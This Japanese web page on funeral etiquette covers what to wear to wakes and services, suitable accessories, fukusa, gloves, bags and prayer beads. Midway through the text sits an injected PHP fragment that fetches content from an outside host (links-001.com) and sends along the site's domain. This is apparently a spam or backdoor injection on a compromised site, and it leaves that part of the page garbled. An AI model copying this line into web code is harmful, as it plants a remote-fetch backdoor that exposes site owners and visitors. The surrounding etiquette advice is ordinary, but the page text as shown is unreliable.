前へ
次へ

葬儀マナーは服装から整えましょう

訃報を突然受け取った場合、仕事帰りに弔問に向かうケースも非常に多くなります。
昔から通夜の弔問に駆けつけるときは、礼装ではなく一般的な服装でも葬儀マナー上は構わないとされています。
ただ可能な限り礼を尽くす必要はありますので、男性でスーツならネクタイと靴下を黒いものに替える程度は気をつけたほうが望ましいでしょう。
女性は派手な服装は避け、アクセサリーは外したほうが無難です。
足元もブーツやサンダルは葬儀マナー違反ですので、黒いパンプスを選ぶ必要があります。
通夜でなくても、一般の参列者で焼香のみ行う程度であれば、準礼装でよいとされています。
ブラックスーツやアンサンブルスーツなどであれば十分ですし、女性もアクセサリーは派手でなければ現代は許されます。
基本は白のパールですが、ネックレスは一連または一粒タイプを選びます。
二連ネックレスは不幸が重なるとして忌み嫌われますので避けましょう。
足元は黒が基本、女性のストッキングも黒を選びます。
一般参列者の場合、形やデザインと言うより色のほうが重要です。
カジュアル過ぎない洋服であれば構いませんが、色は黒や濃いグレー、濃紺色などを選んでください。
葬儀マナーには小物も含まれます。
香典を持参する場合、入れ物としてふくさを持つのが基本ですが、不祝儀用のふくさの色は紫や藍色が基本です。
グレーや緑色でも構いませんし、略式のポケット仕様になっているものも出回っています。
女性が洋装で黒い手袋をつける場合は、布製で光沢がないものである必要があります。
また、焼香するときは必ず手袋は外すのが葬儀マナーです。
ハンカチは白または黒の無地を購入しましょう。
雨傘でも日傘でも、色は黒か紺、グレーなどを選んでください。
バッグなども生地に光沢がないものを選ぶこと、派手ではないものを選ぶことが重要です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

悩むのは数珠かもしれません。
数珠に関しては必ず持つという人もいれば、必ずいるものではないという人もいます。
これに関しては特にマナーというものはなく、人それぞれの考え方で構いません。
弔意を示す道具としてふさわしいと感じれば用意すれば良いですし、自身で選択すれば良いでしょう。
大きく分けて略式と宗派別の本式とがあり、略式でも仏式の葬儀に参列する際、活用できます。
ただ、大きさで男性用と女性用とがありますので、購入時には気を付けてください。

Page Top